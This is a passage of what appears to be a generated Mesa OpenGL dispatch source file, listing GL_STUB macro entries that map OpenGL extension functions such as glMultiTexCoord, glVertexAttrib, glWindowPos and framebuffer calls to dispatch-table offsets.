GL_STUB(glMultiTexCoord1svARB, _gloffset_MultiTexCoord1svARB)
GL_STUB(glMultiTexCoord2dARB, _gloffset_MultiTexCoord2dARB)
GL_STUB(glMultiTexCoord2dvARB, _gloffset_MultiTexCoord2dvARB)
GL_STUB(glMultiTexCoord2fARB, _gloffset_MultiTexCoord2fARB)
GL_STUB(glMultiTexCoord2fvARB, _gloffset_MultiTexCoord2fvARB)
GL_STUB(glMultiTexCoord2iARB, _gloffset_MultiTexCoord2iARB)
GL_STUB(glMultiTexCoord2ivARB, _gloffset_MultiTexCoord2ivARB)
GL_STUB(glMultiTexCoord2sARB, _gloffset_MultiTexCoord2sARB)
GL_STUB(glMultiTexCoord2svARB, _gloffset_MultiTexCoord2svARB)
GL_STUB(glMultiTexCoord3dARB, _gloffset_MultiTexCoord3dARB)
GL_STUB(glMultiTexCoord3dvARB, _gloffset_MultiTexCoord3dvARB)
GL_STUB(glMultiTexCoord3fARB, _gloffset_MultiTexCoord3fARB)
GL_STUB(glMultiTexCoord3fvARB, _gloffset_MultiTexCoord3fvARB)
GL_STUB(glMultiTexCoord3iARB, _gloffset_MultiTexCoord3iARB)
GL_STUB(glMultiTexCoord3ivARB, _gloffset_MultiTexCoord3ivARB)
GL_STUB(glMultiTexCoord3sARB, _gloffset_MultiTexCoord3sARB)
GL_STUB(glMultiTexCoord3svARB, _gloffset_MultiTexCoord3svARB)
GL_STUB(glMultiTexCoord4dARB, _gloffset_MultiTexCoord4dARB)
GL_STUB(glMultiTexCoord4dvARB, _gloffset_MultiTexCoord4dvARB)
GL_STUB(glMultiTexCoord4fARB, _gloffset_MultiTexCoord4fARB)
GL_STUB(glMultiTexCoord4fvARB, _gloffset_MultiTexCoord4fvARB)
GL_STUB(glMultiTexCoord4iARB, _gloffset_MultiTexCoord4iARB)
GL_STUB(glMultiTexCoord4ivARB, _gloffset_MultiTexCoord4ivARB)
GL_STUB(glMultiTexCoord4sARB, _gloffset_MultiTexCoord4sARB)
GL_STUB(glMultiTexCoord4svARB, _gloffset_MultiTexCoord4svARB)
GL_STUB(glAttachShader, _gloffset_AttachShader)
GL_STUB(glCreateProgram, _gloffset_CreateProgram)
GL_STUB(glCreateShader, _gloffset_CreateShader)
GL_STUB(glDeleteProgram, _gloffset_DeleteProgram)
GL_STUB(glDeleteShader, _gloffset_DeleteShader)
GL_STUB(glDetachShader, _gloffset_DetachShader)
GL_STUB(glGetAttachedShaders, _gloffset_GetAttachedShaders)
GL_STUB(glGetProgramInfoLog, _gloffset_GetProgramInfoLog)
GL_STUB(glGetProgramiv, _gloffset_GetProgramiv)
GL_STUB(glGetShaderInfoLog, _gloffset_GetShaderInfoLog)
GL_STUB(glGetShaderiv, _gloffset_GetShaderiv)
GL_STUB(glIsProgram, _gloffset_IsProgram)
GL_STUB(glIsShader, _gloffset_IsShader)
GL_STUB(glStencilFuncSeparate, _gloffset_StencilFuncSeparate)
GL_STUB(glStencilMaskSeparate, _gloffset_StencilMaskSeparate)
GL_STUB(glStencilOpSeparate, _gloffset_StencilOpSeparate)
GL_STUB(glUniformMatrix2x3fv, _gloffset_UniformMatrix2x3fv)
GL_STUB(glUniformMatrix2x4fv, _gloffset_UniformMatrix2x4fv)
GL_STUB(glUniformMatrix3x2fv, _gloffset_UniformMatrix3x2fv)
GL_STUB(glUniformMatrix3x4fv, _gloffset_UniformMatrix3x4fv)
GL_STUB(glUniformMatrix4x2fv, _gloffset_UniformMatrix4x2fv)
GL_STUB(glUniformMatrix4x3fv, _gloffset_UniformMatrix4x3fv)
GL_STUB(glLoadTransposeMatrixdARB, _gloffset_LoadTransposeMatrixdARB)
GL_STUB(glLoadTransposeMatrixfARB, _gloffset_LoadTransposeMatrixfARB)
GL_STUB(glMultTransposeMatrixdARB, _gloffset_MultTransposeMatrixdARB)
GL_STUB(glMultTransposeMatrixfARB, _gloffset_MultTransposeMatrixfARB)
GL_STUB(glSampleCoverageARB, _gloffset_SampleCoverageARB)
GL_STUB(glCompressedTexImage1DARB, _gloffset_CompressedTexImage1DARB)
GL_STUB(glCompressedTexImage2DARB, _gloffset_CompressedTexImage2DARB)
GL_STUB(glCompressedTexImage3DARB, _gloffset_CompressedTexImage3DARB)
GL_STUB(glCompressedTexSubImage1DARB, _gloffset_CompressedTexSubImage1DARB)
GL_STUB(glCompressedTexSubImage2DARB, _gloffset_CompressedTexSubImage2DARB)
GL_STUB(glCompressedTexSubImage3DARB, _gloffset_CompressedTexSubImage3DARB)
GL_STUB(glGetCompressedTexImageARB, _gloffset_GetCompressedTexImageARB)
GL_STUB(glDisableVertexAttribArrayARB, _gloffset_DisableVertexAttribArrayARB)
GL_STUB(glEnableVertexAttribArrayARB, _gloffset_EnableVertexAttribArrayARB)
GL_STUB(glGetProgramEnvParameterdvARB, _gloffset_GetProgramEnvParameterdvARB)
GL_STUB(glGetProgramEnvParameterfvARB, _gloffset_GetProgramEnvParameterfvARB)
GL_STUB(glGetProgramLocalParameterdvARB, _gloffset_GetProgramLocalParameterdvARB)
GL_STUB(glGetProgramLocalParameterfvARB, _gloffset_GetProgramLocalParameterfvARB)
GL_STUB(glGetProgramStringARB, _gloffset_GetProgramStringARB)
GL_STUB(glGetProgramivARB, _gloffset_GetProgramivARB)
GL_STUB(glGetVertexAttribdvARB, _gloffset_GetVertexAttribdvARB)
GL_STUB(glGetVertexAttribfvARB, _gloffset_GetVertexAttribfvARB)
GL_STUB(glGetVertexAttribivARB, _gloffset_GetVertexAttribivARB)
GL_STUB(glProgramEnvParameter4dARB, _gloffset_ProgramEnvParameter4dARB)
GL_STUB(glProgramEnvParameter4dvARB, _gloffset_ProgramEnvParameter4dvARB)
GL_STUB(glProgramEnvParameter4fARB, _gloffset_ProgramEnvParameter4fARB)
GL_STUB(glProgramEnvParameter4fvARB, _gloffset_ProgramEnvParameter4fvARB)
GL_STUB(glProgramLocalParameter4dARB, _gloffset_ProgramLocalParameter4dARB)
GL_STUB(glProgramLocalParameter4dvARB, _gloffset_ProgramLocalParameter4dvARB)
GL_STUB(glProgramLocalParameter4fARB, _gloffset_ProgramLocalParameter4fARB)
GL_STUB(glProgramLocalParameter4fvARB, _gloffset_ProgramLocalParameter4fvARB)
GL_STUB(glProgramStringARB, _gloffset_ProgramStringARB)
GL_STUB(glVertexAttrib1dARB, _gloffset_VertexAttrib1dARB)
GL_STUB(glVertexAttrib1dvARB, _gloffset_VertexAttrib1dvARB)
GL_STUB(glVertexAttrib1fARB, _gloffset_VertexAttrib1fARB)
GL_STUB(glVertexAttrib1fvARB, _gloffset_VertexAttrib1fvARB)
GL_STUB(glVertexAttrib1sARB, _gloffset_VertexAttrib1sARB)
GL_STUB(glVertexAttrib1svARB, _gloffset_VertexAttrib1svARB)
GL_STUB(glVertexAttrib2dARB, _gloffset_VertexAttrib2dARB)
GL_STUB(glVertexAttrib2dvARB, _gloffset_VertexAttrib2dvARB)
GL_STUB(glVertexAttrib2fARB, _gloffset_VertexAttrib2fARB)
GL_STUB(glVertexAttrib2fvARB, _gloffset_VertexAttrib2fvARB)
GL_STUB(glVertexAttrib2sARB, _gloffset_VertexAttrib2sARB)
GL_STUB(glVertexAttrib2svARB, _gloffset_VertexAttrib2svARB)
GL_STUB(glVertexAttrib3dARB, _gloffset_VertexAttrib3dARB)
GL_STUB(glVertexAttrib3dvARB, _gloffset_VertexAttrib3dvARB)
GL_STUB(glVertexAttrib3fARB, _gloffset_VertexAttrib3fARB)
GL_STUB(glVertexAttrib3fvARB, _gloffset_VertexAttrib3fvARB)
GL_STUB(glVertexAttrib3sARB, _gloffset_VertexAttrib3sARB)
GL_STUB(glVertexAttrib3svARB, _gloffset_VertexAttrib3svARB)
GL_STUB(glVertexAttrib4NbvARB, _gloffset_VertexAttrib4NbvARB)
GL_STUB(glVertexAttrib4NivARB, _gloffset_VertexAttrib4NivARB)
GL_STUB(glVertexAttrib4NsvARB, _gloffset_VertexAttrib4NsvARB)
GL_STUB(glVertexAttrib4NubARB, _gloffset_VertexAttrib4NubARB)
GL_STUB(glVertexAttrib4NubvARB, _gloffset_VertexAttrib4NubvARB)
GL_STUB(glVertexAttrib4NuivARB, _gloffset_VertexAttrib4NuivARB)
GL_STUB(glVertexAttrib4NusvARB, _gloffset_VertexAttrib4NusvARB)
GL_STUB(glVertexAttrib4bvARB, _gloffset_VertexAttrib4bvARB)
GL_STUB(glVertexAttrib4dARB, _gloffset_VertexAttrib4dARB)
GL_STUB(glVertexAttrib4dvARB, _gloffset_VertexAttrib4dvARB)
GL_STUB(glVertexAttrib4fARB, _gloffset_VertexAttrib4fARB)
GL_STUB(glVertexAttrib4fvARB, _gloffset_VertexAttrib4fvARB)
GL_STUB(glVertexAttrib4ivARB, _gloffset_VertexAttrib4ivARB)
GL_STUB(glVertexAttrib4sARB, _gloffset_VertexAttrib4sARB)
GL_STUB(glVertexAttrib4svARB, _gloffset_VertexAttrib4svARB)
GL_STUB(glVertexAttrib4ubvARB, _gloffset_VertexAttrib4ubvARB)
GL_STUB(glVertexAttrib4uivARB, _gloffset_VertexAttrib4uivARB)
GL_STUB(glVertexAttrib4usvARB, _gloffset_VertexAttrib4usvARB)
GL_STUB(glVertexAttribPointerARB, _gloffset_VertexAttribPointerARB)
GL_STUB(glBindBufferARB, _gloffset_BindBufferARB)
GL_STUB(glBufferDataARB, _gloffset_BufferDataARB)
GL_STUB(glBufferSubDataARB, _gloffset_BufferSubDataARB)
GL_STUB(glDeleteBuffersARB, _gloffset_DeleteBuffersARB)
GL_STUB(glGenBuffersARB, _gloffset_GenBuffersARB)
GL_STUB(glGetBufferParameterivARB, _gloffset_GetBufferParameterivARB)
GL_STUB(glGetBufferPointervARB, _gloffset_GetBufferPointervARB)
GL_STUB(glGetBufferSubDataARB, _gloffset_GetBufferSubDataARB)
GL_STUB(glIsBufferARB, _gloffset_IsBufferARB)
GL_STUB(glMapBufferARB, _gloffset_MapBufferARB)
GL_STUB(glUnmapBufferARB, _gloffset_UnmapBufferARB)
GL_STUB(glBeginQueryARB, _gloffset_BeginQueryARB)
GL_STUB(glDeleteQueriesARB, _gloffset_DeleteQueriesARB)
GL_STUB(glEndQueryARB, _gloffset_EndQueryARB)
GL_STUB(glGenQueriesARB, _gloffset_GenQueriesARB)
GL_STUB(glGetQueryObjectivARB, _gloffset_GetQueryObjectivARB)
GL_STUB(glGetQueryObjectuivARB, _gloffset_GetQueryObjectuivARB)
GL_STUB(glGetQueryivARB, _gloffset_GetQueryivARB)
GL_STUB(glIsQueryARB, _gloffset_IsQueryARB)
GL_STUB(glAttachObjectARB, _gloffset_AttachObjectARB)
GL_STUB(glCompileShaderARB, _gloffset_CompileShaderARB)
GL_STUB(glCreateProgramObjectARB, _gloffset_CreateProgramObjectARB)
GL_STUB(glCreateShaderObjectARB, _gloffset_CreateShaderObjectARB)
GL_STUB(glDeleteObjectARB, _gloffset_DeleteObjectARB)
GL_STUB(glDetachObjectARB, _gloffset_DetachObjectARB)
GL_STUB(glGetActiveUniformARB, _gloffset_GetActiveUniformARB)
GL_STUB(glGetAttachedObjectsARB, _gloffset_GetAttachedObjectsARB)
GL_STUB(glGetHandleARB, _gloffset_GetHandleARB)
GL_STUB(glGetInfoLogARB, _gloffset_GetInfoLogARB)
GL_STUB(glGetObjectParameterfvARB, _gloffset_GetObjectParameterfvARB)
GL_STUB(glGetObjectParameterivARB, _gloffset_GetObjectParameterivARB)
GL_STUB(glGetShaderSourceARB, _gloffset_GetShaderSourceARB)
GL_STUB(glGetUniformLocationARB, _gloffset_GetUniformLocationARB)
GL_STUB(glGetUniformfvARB, _gloffset_GetUniformfvARB)
GL_STUB(glGetUniformivARB, _gloffset_GetUniformivARB)
GL_STUB(glLinkProgramARB, _gloffset_LinkProgramARB)
GL_STUB(glShaderSourceARB, _gloffset_ShaderSourceARB)
GL_STUB(glUniform1fARB, _gloffset_Uniform1fARB)
GL_STUB(glUniform1fvARB, _gloffset_Uniform1fvARB)
GL_STUB(glUniform1iARB, _gloffset_Uniform1iARB)
GL_STUB(glUniform1ivARB, _gloffset_Uniform1ivARB)
GL_STUB(glUniform2fARB, _gloffset_Uniform2fARB)
GL_STUB(glUniform2fvARB, _gloffset_Uniform2fvARB)
GL_STUB(glUniform2iARB, _gloffset_Uniform2iARB)
GL_STUB(glUniform2ivARB, _gloffset_Uniform2ivARB)
GL_STUB(glUniform3fARB, _gloffset_Uniform3fARB)
GL_STUB(glUniform3fvARB, _gloffset_Uniform3fvARB)
GL_STUB(glUniform3iARB, _gloffset_Uniform3iARB)
GL_STUB(glUniform3ivARB, _gloffset_Uniform3ivARB)
GL_STUB(glUniform4fARB, _gloffset_Uniform4fARB)
GL_STUB(glUniform4fvARB, _gloffset_Uniform4fvARB)
GL_STUB(glUniform4iARB, _gloffset_Uniform4iARB)
GL_STUB(glUniform4ivARB, _gloffset_Uniform4ivARB)
GL_STUB(glUniformMatrix2fvARB, _gloffset_UniformMatrix2fvARB)
GL_STUB(glUniformMatrix3fvARB, _gloffset_UniformMatrix3fvARB)
GL_STUB(glUniformMatrix4fvARB, _gloffset_UniformMatrix4fvARB)
GL_STUB(glUseProgramObjectARB, _gloffset_UseProgramObjectARB)
GL_STUB(glValidateProgramARB, _gloffset_ValidateProgramARB)
GL_STUB(glBindAttribLocationARB, _gloffset_BindAttribLocationARB)
GL_STUB(glGetActiveAttribARB, _gloffset_GetActiveAttribARB)
GL_STUB(glGetAttribLocationARB, _gloffset_GetAttribLocationARB)
GL_STUB(glDrawBuffersARB, _gloffset_DrawBuffersARB)
GL_STUB(glPolygonOffsetEXT, _gloffset_PolygonOffsetEXT)
GL_STUB(gl_dispatch_stub_562, _gloffset__dispatch_stub_562)
GL_STUB(gl_dispatch_stub_563, _gloffset__dispatch_stub_563)
GL_STUB(gl_dispatch_stub_564, _gloffset__dispatch_stub_564)
GL_STUB(gl_dispatch_stub_565, _gloffset__dispatch_stub_565)
GL_STUB(gl_dispatch_stub_566, _gloffset__dispatch_stub_566)
GL_STUB(gl_dispatch_stub_567, _gloffset__dispatch_stub_567)
GL_STUB(gl_dispatch_stub_568, _gloffset__dispatch_stub_568)
GL_STUB(gl_dispatch_stub_569, _gloffset__dispatch_stub_569)
GL_STUB(glColorPointerEXT, _gloffset_ColorPointerEXT)
GL_STUB(glEdgeFlagPointerEXT, _gloffset_EdgeFlagPointerEXT)
GL_STUB(glIndexPointerEXT, _gloffset_IndexPointerEXT)
GL_STUB(glNormalPointerEXT, _gloffset_NormalPointerEXT)
GL_STUB(glTexCoordPointerEXT, _gloffset_TexCoordPointerEXT)
GL_STUB(glVertexPointerEXT, _gloffset_VertexPointerEXT)
GL_STUB(glPointParameterfEXT, _gloffset_PointParameterfEXT)
GL_STUB(glPointParameterfvEXT, _gloffset_PointParameterfvEXT)
GL_STUB(glLockArraysEXT, _gloffset_LockArraysEXT)
GL_STUB(glUnlockArraysEXT, _gloffset_UnlockArraysEXT)
GL_STUB(gl_dispatch_stub_580, _gloffset__dispatch_stub_580)
GL_STUB(gl_dispatch_stub_581, _gloffset__dispatch_stub_581)
GL_STUB(glSecondaryColor3bEXT, _gloffset_SecondaryColor3bEXT)
GL_STUB(glSecondaryColor3bvEXT, _gloffset_SecondaryColor3bvEXT)
GL_STUB(glSecondaryColor3dEXT, _gloffset_SecondaryColor3dEXT)
GL_STUB(glSecondaryColor3dvEXT, _gloffset_SecondaryColor3dvEXT)
GL_STUB(glSecondaryColor3fEXT, _gloffset_SecondaryColor3fEXT)
GL_STUB(glSecondaryColor3fvEXT, _gloffset_SecondaryColor3fvEXT)
GL_STUB(glSecondaryColor3iEXT, _gloffset_SecondaryColor3iEXT)
GL_STUB(glSecondaryColor3ivEXT, _gloffset_SecondaryColor3ivEXT)
GL_STUB(glSecondaryColor3sEXT, _gloffset_SecondaryColor3sEXT)
GL_STUB(glSecondaryColor3svEXT, _gloffset_SecondaryColor3svEXT)
GL_STUB(glSecondaryColor3ubEXT, _gloffset_SecondaryColor3ubEXT)
GL_STUB(glSecondaryColor3ubvEXT, _gloffset_SecondaryColor3ubvEXT)
GL_STUB(glSecondaryColor3uiEXT, _gloffset_SecondaryColor3uiEXT)
GL_STUB(glSecondaryColor3uivEXT, _gloffset_SecondaryColor3uivEXT)
GL_STUB(glSecondaryColor3usEXT, _gloffset_SecondaryColor3usEXT)
GL_STUB(glSecondaryColor3usvEXT, _gloffset_SecondaryColor3usvEXT)
GL_STUB(glSecondaryColorPointerEXT, _gloffset_SecondaryColorPointerEXT)
GL_STUB(glMultiDrawArraysEXT, _gloffset_MultiDrawArraysEXT)
GL_STUB(glMultiDrawElementsEXT, _gloffset_MultiDrawElementsEXT)
GL_STUB(glFogCoordPointerEXT, _gloffset_FogCoordPointerEXT)
GL_STUB(glFogCoorddEXT, _gloffset_FogCoorddEXT)
GL_STUB(glFogCoorddvEXT, _gloffset_FogCoorddvEXT)
GL_STUB(glFogCoordfEXT, _gloffset_FogCoordfEXT)
GL_STUB(glFogCoordfvEXT, _gloffset_FogCoordfvEXT)
GL_STUB(gl_dispatch_stub_606, _gloffset__dispatch_stub_606)
GL_STUB(glBlendFuncSeparateEXT, _gloffset_BlendFuncSeparateEXT)
GL_STUB(glFlushVertexArrayRangeNV, _gloffset_FlushVertexArrayRangeNV)
GL_STUB(glVertexArrayRangeNV, _gloffset_VertexArrayRangeNV)
GL_STUB(glCombinerInputNV, _gloffset_CombinerInputNV)
GL_STUB(glCombinerOutputNV, _gloffset_CombinerOutputNV)
GL_STUB(glCombinerParameterfNV, _gloffset_CombinerParameterfNV)
GL_STUB(glCombinerParameterfvNV, _gloffset_CombinerParameterfvNV)
GL_STUB(glCombinerParameteriNV, _gloffset_CombinerParameteriNV)
GL_STUB(glCombinerParameterivNV, _gloffset_CombinerParameterivNV)
GL_STUB(glFinalCombinerInputNV, _gloffset_FinalCombinerInputNV)
GL_STUB(glGetCombinerInputParameterfvNV, _gloffset_GetCombinerInputParameterfvNV)
GL_STUB(glGetCombinerInputParameterivNV, _gloffset_GetCombinerInputParameterivNV)
GL_STUB(glGetCombinerOutputParameterfvNV, _gloffset_GetCombinerOutputParameterfvNV)
GL_STUB(glGetCombinerOutputParameterivNV, _gloffset_GetCombinerOutputParameterivNV)
GL_STUB(glGetFinalCombinerInputParameterfvNV, _gloffset_GetFinalCombinerInputParameterfvNV)
GL_STUB(glGetFinalCombinerInputParameterivNV, _gloffset_GetFinalCombinerInputParameterivNV)
GL_STUB(glResizeBuffersMESA, _gloffset_ResizeBuffersMESA)
GL_STUB(glWindowPos2dMESA, _gloffset_WindowPos2dMESA)
GL_STUB(glWindowPos2dvMESA, _gloffset_WindowPos2dvMESA)
GL_STUB(glWindowPos2fMESA, _gloffset_WindowPos2fMESA)
GL_STUB(glWindowPos2fvMESA, _gloffset_WindowPos2fvMESA)
GL_STUB(glWindowPos2iMESA, _gloffset_WindowPos2iMESA)
GL_STUB(glWindowPos2ivMESA, _gloffset_WindowPos2ivMESA)
GL_STUB(glWindowPos2sMESA, _gloffset_WindowPos2sMESA)
GL_STUB(glWindowPos2svMESA, _gloffset_WindowPos2svMESA)
GL_STUB(glWindowPos3dMESA, _gloffset_WindowPos3dMESA)
GL_STUB(glWindowPos3dvMESA, _gloffset_WindowPos3dvMESA)
GL_STUB(glWindowPos3fMESA, _gloffset_WindowPos3fMESA)
GL_STUB(glWindowPos3fvMESA, _gloffset_WindowPos3fvMESA)
GL_STUB(glWindowPos3iMESA, _gloffset_WindowPos3iMESA)
GL_STUB(glWindowPos3ivMESA, _gloffset_WindowPos3ivMESA)
GL_STUB(glWindowPos3sMESA, _gloffset_WindowPos3sMESA)
GL_STUB(glWindowPos3svMESA, _gloffset_WindowPos3svMESA)
GL_STUB(glWindowPos4dMESA, _gloffset_WindowPos4dMESA)
GL_STUB(glWindowPos4dvMESA, _gloffset_WindowPos4dvMESA)
GL_STUB(glWindowPos4fMESA, _gloffset_WindowPos4fMESA)
GL_STUB(glWindowPos4fvMESA, _gloffset_WindowPos4fvMESA)
GL_STUB(glWindowPos4iMESA, _gloffset_WindowPos4iMESA)
GL_STUB(glWindowPos4ivMESA, _gloffset_WindowPos4ivMESA)
GL_STUB(glWindowPos4sMESA, _gloffset_WindowPos4sMESA)
GL_STUB(glWindowPos4svMESA, _gloffset_WindowPos4svMESA)
GL_STUB(gl_dispatch_stub_648, _gloffset__dispatch_stub_648)
GL_STUB(gl_dispatch_stub_649, _gloffset__dispatch_stub_649)
GL_STUB(gl_dispatch_stub_650, _gloffset__dispatch_stub_650)
GL_STUB(gl_dispatch_stub_651, _gloffset__dispatch_stub_651)
GL_STUB(gl_dispatch_stub_652, _gloffset__dispatch_stub_652)
GL_STUB(gl_dispatch_stub_653, _gloffset__dispatch_stub_653)
GL_STUB(gl_dispatch_stub_654, _gloffset__dispatch_stub_654)
GL_STUB(gl_dispatch_stub_655, _gloffset__dispatch_stub_655)
GL_STUB(gl_dispatch_stub_656, _gloffset__dispatch_stub_656)
GL_STUB(glAreProgramsResidentNV, _gloffset_AreProgramsResidentNV)
GL_STUB(glBindProgramNV, _gloffset_BindProgramNV)
GL_STUB(glDeleteProgramsNV, _gloffset_DeleteProgramsNV)
GL_STUB(glExecuteProgramNV, _gloffset_ExecuteProgramNV)
GL_STUB(glGenProgramsNV, _gloffset_GenProgramsNV)
GL_STUB(glGetProgramParameterdvNV, _gloffset_GetProgramParameterdvNV)
GL_STUB(glGetProgramParameterfvNV, _gloffset_GetProgramParameterfvNV)
GL_STUB(glGetProgramStringNV, _gloffset_GetProgramStringNV)
GL_STUB(glGetProgramivNV, _gloffset_GetProgramivNV)
GL_STUB(glGetTrackMatrixivNV, _gloffset_GetTrackMatrixivNV)
GL_STUB(glGetVertexAttribPointervNV, _gloffset_GetVertexAttribPointervNV)
GL_STUB(glGetVertexAttribdvNV, _gloffset_GetVertexAttribdvNV)
GL_STUB(glGetVertexAttribfvNV, _gloffset_GetVertexAttribfvNV)
GL_STUB(glGetVertexAttribivNV, _gloffset_GetVertexAttribivNV)
GL_STUB(glIsProgramNV, _gloffset_IsProgramNV)
GL_STUB(glLoadProgramNV, _gloffset_LoadProgramNV)
GL_STUB(glProgramParameters4dvNV, _gloffset_ProgramParameters4dvNV)
GL_STUB(glProgramParameters4fvNV, _gloffset_ProgramParameters4fvNV)
GL_STUB(glRequestResidentProgramsNV, _gloffset_RequestResidentProgramsNV)
GL_STUB(glTrackMatrixNV, _gloffset_TrackMatrixNV)
GL_STUB(glVertexAttrib1dNV, _gloffset_VertexAttrib1dNV)
GL_STUB(glVertexAttrib1dvNV, _gloffset_VertexAttrib1dvNV)
GL_STUB(glVertexAttrib1fNV, _gloffset_VertexAttrib1fNV)
GL_STUB(glVertexAttrib1fvNV, _gloffset_VertexAttrib1fvNV)
GL_STUB(glVertexAttrib1sNV, _gloffset_VertexAttrib1sNV)
GL_STUB(glVertexAttrib1svNV, _gloffset_VertexAttrib1svNV)
GL_STUB(glVertexAttrib2dNV, _gloffset_VertexAttrib2dNV)
GL_STUB(glVertexAttrib2dvNV, _gloffset_VertexAttrib2dvNV)
GL_STUB(glVertexAttrib2fNV, _gloffset_VertexAttrib2fNV)
GL_STUB(glVertexAttrib2fvNV, _gloffset_VertexAttrib2fvNV)
GL_STUB(glVertexAttrib2sNV, _gloffset_VertexAttrib2sNV)
GL_STUB(glVertexAttrib2svNV, _gloffset_VertexAttrib2svNV)
GL_STUB(glVertexAttrib3dNV, _gloffset_VertexAttrib3dNV)
GL_STUB(glVertexAttrib3dvNV, _gloffset_VertexAttrib3dvNV)
GL_STUB(glVertexAttrib3fNV, _gloffset_VertexAttrib3fNV)
GL_STUB(glVertexAttrib3fvNV, _gloffset_VertexAttrib3fvNV)
GL_STUB(glVertexAttrib3sNV, _gloffset_VertexAttrib3sNV)
GL_STUB(glVertexAttrib3svNV, _gloffset_VertexAttrib3svNV)
GL_STUB(glVertexAttrib4dNV, _gloffset_VertexAttrib4dNV)
GL_STUB(glVertexAttrib4dvNV, _gloffset_VertexAttrib4dvNV)
GL_STUB(glVertexAttrib4fNV, _gloffset_VertexAttrib4fNV)
GL_STUB(glVertexAttrib4fvNV, _gloffset_VertexAttrib4fvNV)
GL_STUB(glVertexAttrib4sNV, _gloffset_VertexAttrib4sNV)
GL_STUB(glVertexAttrib4svNV, _gloffset_VertexAttrib4svNV)
GL_STUB(glVertexAttrib4ubNV, _gloffset_VertexAttrib4ubNV)
GL_STUB(glVertexAttrib4ubvNV, _gloffset_VertexAttrib4ubvNV)
GL_STUB(glVertexAttribPointerNV, _gloffset_VertexAttribPointerNV)
GL_STUB(glVertexAttribs1dvNV, _gloffset_VertexAttribs1dvNV)
GL_STUB(glVertexAttribs1fvNV, _gloffset_VertexAttribs1fvNV)
GL_STUB(glVertexAttribs1svNV, _gloffset_VertexAttribs1svNV)
GL_STUB(glVertexAttribs2dvNV, _gloffset_VertexAttribs2dvNV)
GL_STUB(glVertexAttribs2fvNV, _gloffset_VertexAttribs2fvNV)
GL_STUB(glVertexAttribs2svNV, _gloffset_VertexAttribs2svNV)
GL_STUB(glVertexAttribs3dvNV, _gloffset_VertexAttribs3dvNV)
GL_STUB(glVertexAttribs3fvNV, _gloffset_VertexAttribs3fvNV)
GL_STUB(glVertexAttribs3svNV, _gloffset_VertexAttribs3svNV)
GL_STUB(glVertexAttribs4dvNV, _gloffset_VertexAttribs4dvNV)
GL_STUB(glVertexAttribs4fvNV, _gloffset_VertexAttribs4fvNV)
GL_STUB(glVertexAttribs4svNV, _gloffset_VertexAttribs4svNV)
GL_STUB(glVertexAttribs4ubvNV, _gloffset_VertexAttribs4ubvNV)
GL_STUB(glAlphaFragmentOp1ATI, _gloffset_AlphaFragmentOp1ATI)
GL_STUB(glAlphaFragmentOp2ATI, _gloffset_AlphaFragmentOp2ATI)
GL_STUB(glAlphaFragmentOp3ATI, _gloffset_AlphaFragmentOp3ATI)
GL_STUB(glBeginFragmentShaderATI, _gloffset_BeginFragmentShaderATI)
GL_STUB(glBindFragmentShaderATI, _gloffset_BindFragmentShaderATI)
GL_STUB(glColorFragmentOp1ATI, _gloffset_ColorFragmentOp1ATI)
GL_STUB(glColorFragmentOp2ATI, _gloffset_ColorFragmentOp2ATI)
GL_STUB(glColorFragmentOp3ATI, _gloffset_ColorFragmentOp3ATI)
GL_STUB(glDeleteFragmentShaderATI, _gloffset_DeleteFragmentShaderATI)
GL_STUB(glEndFragmentShaderATI, _gloffset_EndFragmentShaderATI)
GL_STUB(glGenFragmentShadersATI, _gloffset_GenFragmentShadersATI)
GL_STUB(glPassTexCoordATI, _gloffset_PassTexCoordATI)
GL_STUB(glSampleMapATI, _gloffset_SampleMapATI)
GL_STUB(glSetFragmentShaderConstantATI, _gloffset_SetFragmentShaderConstantATI)
GL_STUB(glPointParameteriNV, _gloffset_PointParameteriNV)
GL_STUB(glPointParameterivNV, _gloffset_PointParameterivNV)
GL_STUB(gl_dispatch_stub_733, _gloffset__dispatch_stub_733)
GL_STUB(gl_dispatch_stub_734, _gloffset__dispatch_stub_734)
GL_STUB(gl_dispatch_stub_735, _gloffset__dispatch_stub_735)
GL_STUB(gl_dispatch_stub_736, _gloffset__dispatch_stub_736)
GL_STUB(gl_dispatch_stub_737, _gloffset__dispatch_stub_737)
GL_STUB(glGetProgramNamedParameterdvNV, _gloffset_GetProgramNamedParameterdvNV)
GL_STUB(glGetProgramNamedParameterfvNV, _gloffset_GetProgramNamedParameterfvNV)
GL_STUB(glProgramNamedParameter4dNV, _gloffset_ProgramNamedParameter4dNV)
GL_STUB(glProgramNamedParameter4dvNV, _gloffset_ProgramNamedParameter4dvNV)
GL_STUB(glProgramNamedParameter4fNV, _gloffset_ProgramNamedParameter4fNV)
GL_STUB(glProgramNamedParameter4fvNV, _gloffset_ProgramNamedParameter4fvNV)
GL_STUB(gl_dispatch_stub_744, _gloffset__dispatch_stub_744)
GL_STUB(gl_dispatch_stub_745, _gloffset__dispatch_stub_745)
GL_STUB(glBindFramebufferEXT, _gloffset_BindFramebufferEXT)
GL_STUB(glBindRenderbufferEXT, _gloffset_BindRenderbufferEXT)
GL_STUB(glCheckFramebufferStatusEXT, _gloffset_CheckFramebufferStatusEXT)
GL_STUB(glDeleteFramebuffersEXT, _gloffset_DeleteFramebuffersEXT)
GL_STUB(glDeleteRenderbuffersEXT, _gloffset_DeleteRenderbuffersEXT)
GL_STUB(glFramebufferRenderbufferEXT, _gloffset_FramebufferRenderbufferEXT)
GL_STUB(glFramebufferTexture1DEXT, _gloffset_FramebufferTexture1DEXT)
GL_STUB(glFramebufferTexture2DEXT, _gloffset_FramebufferTexture2DEXT)
GL_STUB(glFramebufferTexture3DEXT, _gloffset_FramebufferTexture3DEXT)
GL_STUB(glGenFramebuffersEXT, _gloffset_GenFramebuffersEXT)
GL_STUB(glGenRenderbuffersEXT, _gloffset_GenRenderbuffersEXT)
GL_STUB(glGenerateMipmapEXT, _gloffset_GenerateMipmapEXT)
GL_STUB(glGetFramebufferAttachmentParameterivEXT, _gloffset_GetFramebufferAttachmentParameterivEXT)
GL_STUB(glGetRenderbufferParameterivEXT, _gloffset_GetRenderbufferParameterivEXT)
GL_STUB(glIsFramebufferEXT, _gloffset_IsFramebufferEXT)
GL_STUB(glIsRenderbufferEXT, _gloffset_IsRenderbufferEXT)
GL_STUB(glRenderbufferStorageEXT, _gloffset_RenderbufferStorageEXT)
GL_STUB(gl_dispatch_stub_763, _gloffset__dispatch_stub_763)
GL_STUB(glFramebufferTextureLayerEXT, _gloffset_FramebufferTextureLayerEXT)
GL_STUB(gl_dispatch_stub_765, _gloffset__dispatch_stub_765)
GL_STUB(gl_dispatch_stub_766, _gloffset__dispatch_stub_766)
